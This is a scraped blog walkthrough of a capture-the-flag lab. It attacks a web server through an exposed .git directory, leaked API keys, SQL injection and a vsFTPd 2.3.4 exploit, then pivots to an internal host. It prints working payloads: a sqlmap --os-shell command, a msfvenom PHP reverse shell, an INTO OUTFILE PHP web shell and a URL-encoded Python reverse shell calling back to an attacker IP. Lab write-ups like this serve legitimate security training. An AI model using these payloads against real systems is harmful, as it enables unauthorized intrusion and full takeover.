.png)
4 months ago
36 BOOK THIS SPACE FOR AD
ARTICLE AD
We are starting another interesting scenario. In general, we will focus our attack mechanism on Git and we will take over the other machine by opening many different ways.
In this article, you will witness how many different approaches are used together in penetration processes.
You may see that the IPs change from time to time, do not care, we will be using different machines as we progress. The entire methodology is the same.
Let’s start cyberpunks!
If you’ve made it this far in the series, you know what we need to do first. First of all, save the values and IPs you use most as constant values on the shell.
This increases your processing speed. Now register the target machine in your local DNS, we will use our /etc/hosts file for this.
Ping to check.
We are ready now.
At this stage, we will explore the machine in front of us and reveal the structure of the machine along with its network structure. For this, we will first use the nmap tool: nmap -sV -sC -oN nmap_result.txt -A -T4 --script=vuln -Pn -sS --min-rate=300 --max-retries=3 -p- $target_ip
-sV: Service version detection.-sC: Runs default scripts, equivalent to --script=default.-oN nmap_result.txt: Outputs the results to a file named nmap_result.txt.-A: Enables OS detection, version detection, script scanning, and traceroute.-T4: Sets the timing template to level 4, making the scan faster.--script=vuln: Runs vulnerability detection scripts.-Pn: Treats all hosts as online (no host discovery, useful for firewall evasion).-sS: Performs a TCP SYN scan, which is less detectable by the target system.--min-rate=300: Ensures the scan sends packets at a minimum rate of 300 packets per second.--max-retries=3: Limits the number of retries for host probes to 3.-p-: Scans all 65535 ports.$target_ip: The target IP address to be scanned.You must be patient. This output gives you valuable results.
We don’t have many open ports. But other additional evidence was given. There are results with which you can create your attack surface along with the version information.
Port 22 (SSH)
Service: OpenSSHVersion: 7.2p2Port 80 (HTTP)
Service: nginxVersion: 1.14.0Did any other detail catch your attention? There is also a page with /.git/. Now let’s show you how you can query just this structure using nmap tool: nmap -p80 ourtargetsite.thm --script=http-git -A -oN git_result_nmap.txt
And note that information: “.git/config matched patterns ‘user’”
The presence of a .git directory accessible via HTTP indicates that the Git repository was not properly secured or removed before deploying the web application. This can lead to significant security issues, as it might allow attackers to retrieve the entire source code history, including sensitive information like:
Configuration filesCredentialsSource code with potential vulnerabilitiesSensitive comments or notes in commit messagesBefore installing an attack mechanism on Git, it is useful to take a look at the application running on HTTP.
Here it asks us for login credentials. You should note this and continue analyzing the page.
You should check if there are any cookies or other values such as session ID information defined to us. In a real scenario, you should always feel free to use the developer tools on the browser.
Yes we have PHPSESSID. It also gives the impression that PHP is used in this infrastructure. Now check “network” connection.
In some scenarios, examine the header information here in detail, you can obtain additional version information.
Now inspect the page.
Write down any evidence you get here.
Now let’s start the attack scenarios on Git.
Install this source on your local: https://github.com/internetwache/GitTools
You should use the dumper tool here. You must authorize the .sh script within the Dumber file.
git-dumper is a tool used to download a Git repository from a website that has a publicly accessible .git directory. This tool can reconstruct the repository from the exposed .git directory, allowing you to clone the repository locally even if the site does not offer a direct download link.
Now you’re ready to use it: ./gitdumper.sh http://ourtargetsite.thm/.git/ /ourtargetdata/git/files/
You can obtain objects and other resources with this command.
Now it’s time to take a look at the files we obtained.
Go to .git destination on your local.
We managed to obtain the documents and other additional files from the other system.
Now we need to browse the contents using the git command.
git logYou’ve seen “Commit IDs” and what they are processed for.
commit b2f776a52fe81a731c6c0fa896e7f9548aafceabAuthor: Context Information Security <recruitment@contextis.com>
Date: Tue Sep 10 14:41:00 2019 +0100
removed sensitive data
commit 79c9539b6566b06d6dec2755fdf58f5f9ec8822f
Author: Context Information Security <recruitment@contextis.com>
Date: Tue Sep 10 14:40:28 2019 +0100
added basic prototype of api gateway
These two look quite interesting…
git show b2f776a52fe81a731c6c0fa896e7f9548aafceabYes we got that! Check other commit.
git show 79c9539b6566b06d6dec2755fdf58f5f9ec8822fThis is how you learned to browse commit contents.
What is HEAD?
HEADis a symbolic reference pointing to wherever you are in your commit history. It follows you wherever you go, whatever you do, like a shadow. If you make a commit, HEAD will move. If you checkout something, HEAD will move. Whatever you do, if you have moved somewhere new in your commit history, HEAD has moved along with you.
We have to show you how you can achieve this manually: curl http://10.10.144.72/.git/logs/HEAD > HEAD.txt
You can also make other discoveries and navigate between files via the browser. We will return to the terminal at this stage.
In the context of Git, an object file refers to the files stored within the .git/objects directory. These files are critical components of a Git repository, as they store the actual data and history of the project. Git uses a content-addressable storage model, where each piece of data (or "object") is identified by a unique SHA-1 hash. This system allows for efficient storage and retrieval of data.
There are four main types of objects in a Git repository:
Blob (Binary Large Object): Represents the content of a file. Blobs are used to store file data without any metadata like filenames.Tree: Represents a directory. A tree object contains pointers to blobs and other trees, allowing Git to store directory structures.Commit: Represents a snapshot of the repository at a certain point in time. A commit object contains a pointer to a tree object, metadata (such as the author, committer, and commit message), and pointers to parent commits.Tag: Represents a named reference to a commit, typically used to mark release points. A tag object contains a reference to a commit object, along with a tag name and optional tagger information.Now let’s explore them and find out what’s inside them.
A file in your working directory is added to the staging area, and Git creates a blob object for it.
Command to view a blob object: git hash-object -w c9539b6566b06d6dec2755fdf58f5f9ec8822fView the contents of the blob object: git cat-file -p 79c9539b6566b06d6dec2755fdf58f5f9ec8822fWhen you make a commit, Git creates a commit object that references the current tree object and any parent commit objects. A tree object is created to represent the state of the directory at the time of the commit: git cat-file -p 51d63292792fb7f97728cd3dcaac3ef364f374ba
Using these mechanisms, you can browse the commit content you want.
Let’s access sensitive data using the blob value defined in api.php: 2229eb414d7945688b90d7cd0a786fd888bcc6a4
Use:
git cat-file -p 2229eb414d7945688b90d7cd0a786fd888bcc6a4Now let’s navigate through the file locations.
There are objects.
You can directly use browser to get this.
Now let’s go back over HTTP and get the APK file.
We will use apktool d mobile-app-prototype.apk command to analyze this.
The command apktool d mobile-app-prototype.apk is used to decompile an Android application package (APK) file named mobile-app-prototype.apk
After running this command, you will see a directory named mobile-app-prototype in your working directory. This directory will contain:
res/: Resource files (e.g., images, layouts).AndroidManifest.xml: The Android manifest file in XML format.smali/: Decompiled Smali code.assets/: Asset files.Other files and directories as needed.Don’t forget to examine every piece of evidence you can get your hands on in a real-life scenario.
Now we can check if there is an API key in this directory: grep -rn ‘api’
We need to use combinations…
Yes! We found something interesting: CBQOSTEFZNL5U8LJB2hhBTDvQi2zQo
But, what is that?
We previously obtained the API key via api.php.
Make a comparison between the two strings:
CBQOSTEFZNL5U8LJB2hhBTDvQi2zQo (Encrypted)ANDVOWLDLAS5Q8OQZ2tu (Plaintext)
The cipher would be Vigenere. You can use this site to decode it https://www.dcode.fr/vigenere-cipher
Table is:
The Vigenère cipher is a method of encrypting alphabetic text by using a simple form of polyalphabetic substitution. It employs a keyword, where each letter of the keyword determines the shift for the corresponding letter of the plaintext. This creates a more complex encryption compared to a simple Caesar cipher, which uses a single shift value.
You should do some research and experiment here. Then you will see that the key is CONTEXT.
Now it’s time to go in depth and browse through the directories. We have a lot of .php.
[OK] api.php[OK] home.php
[OK] functions.php
[OK] CTX_WSUSpect_White_Paper.pdf
[OK] index.php
[OK] info.php
We had previously obtained the WEB API key from the objects we obtained via .git.:WEBLhvOJAH8d50Z4y5G5
Now check GitHack directory:
Examine the home.php file.
Here we get the query schema.
echo ('<li><a href="api.php?documentid='.$documentid.'&apikey=WEBLhvOJAH8d50Z4y5G5g4McG1GMGD">'.$document_name.'</a></li>');Our WEB API key is also: WEBLhvOJAH8d50Z4y5G5g4McG1GMGD
Now check api.php file.
API key is using this function:
$conn = setup_db_connection();//UpdateDocumentName($conn, $_GET['documentid'], $_GET['newname']);
$docDetails = GetDocumentDetails($conn, $_GET['documentid']);
This is a connection request to a database.
Our API key is WEBLhvOJAH8d50Z4y5G5
Then we may think of a SQL Injection attack…
We can try some manually first.
Yeap! Query is running…
Get an error now. We will use just ‘ input.
Now we have the database application name. The error you receive in SQLi attacks is very valuable. Our application is MySQL.
Let’s try order by 3
No output appears.
Try UNION ALL SELECT NULL,version()--
Wow! Got this. Keep trying… Try UNION ALL SELECT NULL,NULL,NULLversion()--
myfirstwebsite ? Could this be a database name? Note it.
Use it AND 1=2 UNION SELECT column_name
Now use %20union%20all%20select%201,2,@@version
It seems like something is working in the background, but we don’t know what it is…
Our direction is correct, but it seems like this will take time. We can use the sqlmap tool: sqlmap -u “http://10.10.144.72/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=aa" -p “documentid” --os-shell
Observe the outputs here carefully.
Yes we got OS shell!
Now we started to walk within the system.
Note these:
tmpbuihj.phptmpuzgfc.php
Then check via browser:
Now we have the upload function. We can get a reverse shell with this.
Note this.
Let’s create our own payload: msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.9.198 lport=11445 -f raw
Then save it as .php file.
Let’s upload it using this mechanism in front of us.
It seems to have been successful.
Let’s switch to the Metasploit tool and put the machine in listening mode.
Run it.
Just trigger the file we created.
We got that!
Let’s go back to URL schemes and set up our attack mechanism with another method. Target api.php allows code execution, we noticed this when we examined the code.
We can do a little trick: %20union%20all%20select%201,2,@@version into outfile ‘/var/www/html/whoami.html'
%20: URL-encoded space character, used to separate parts of the payload in a URL.union all select: The UNION operator is used to combine the results of two or more SELECT statements. ALL ensures that duplicate rows are included.1,2,@@version: This part of the SELECT statement selects three columns. The first column will have the value 1, the second column will have the value 2, and the third column will have the MySQL server version (@@version).into outfile '/var/www/html/whoami.html': The INTO OUTFILE clause writes the result of the SELECT statement into a file on the server. In this case, it writes the results to /var/www/html/whoami.html.We did not receive any errors. Now let’s go to the whoami.html file we created.
Yes! Our theory is correct.
Now let’s get a reverse like this: union all select 1,2,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/our_reverse.php”
No error. Let’s check our file.
Yes, now we can execute code remotely.
We get everything we want.
Let’s go into detail and find a connection.
First, get Python location.
It is /usr/bin/python.
We need to make this raw code so that we can send it via HTML.
import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((%2210.10.9.198%22,12111))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([%22/bin/sh%22,%22-i%22])
It is:
%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.9.198%22,12111));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27The full command is this:
python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.9.198%22,12111));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27Before sending this to the opposite destination, listen to your machine on the port you specified: nc -nlvp 12111
Just send it.
We are in!
Stabilize shell: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Now let’s try to obtain route information: ip route
default via 172.18.0.1 dev eth0
This line indicates the default route (default) for packets that don't match any other route in the routing table. It specifies that these packets should be sent (via) through the gateway (router) with the IP address 172.18.0.1, using the network interface (dev) eth0.172.16.1.0/24 dev eth1 proto kernel scope link src 172.16.1.10
This line defines a route to the network 172.16.1.0/24. It specifies that packets destined for this network (172.16.1.0/24) should be sent directly (scope link) via the network interface (dev) eth1. The src 172.16.1.10 indicates that the source IP address for packets sent to this network should be 172.16.1.10.172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2
This line defines a route to the network 172.18.0.0/16. Similar to the previous line, it specifies that packets destined for this network (172.18.0.0/16) should be sent directly (scope link) via the network interface (dev) eth0. The src 172.18.0.2 indicates that the source IP address for packets sent to this network should be 172.18.0.2.We have two IP ranges:
172.16.1.0/24172.18.0.0/16
We may need to scan these IP ranges. For this we need static binary resources. Use it https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
You should download Nmap and Netcat from here.
We must transfer this to the other party through the session we opened previously via meterpreter.
Let’s activate the shell feature of Meterpreter and try to use these tools.
Don’t forget to authorize these files with chmod.
Run it: ./nmap -sn -T5 --min-parallelism 100 172.16.0.0/16
We have a new IP now: 172.16.1.128
Scan it too.
We also got open ports here. FTP stands clearly before us.
Go back to the Meterpreter environment and use the command: portfwd add -l 21 -p 21 -r 172.16.1.128
Now let’s check it on our own machine.
We got the version now! It is vsFTPd 2.3.4.
Conduct an exploit research on this.
Exactly what we wanted! Check this source:
Download it.
Import this .py file to the system from the file upload location we found before.
Run it via any shell you have: python 49757.py 172.16.1.128
Yes! We are root now!
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·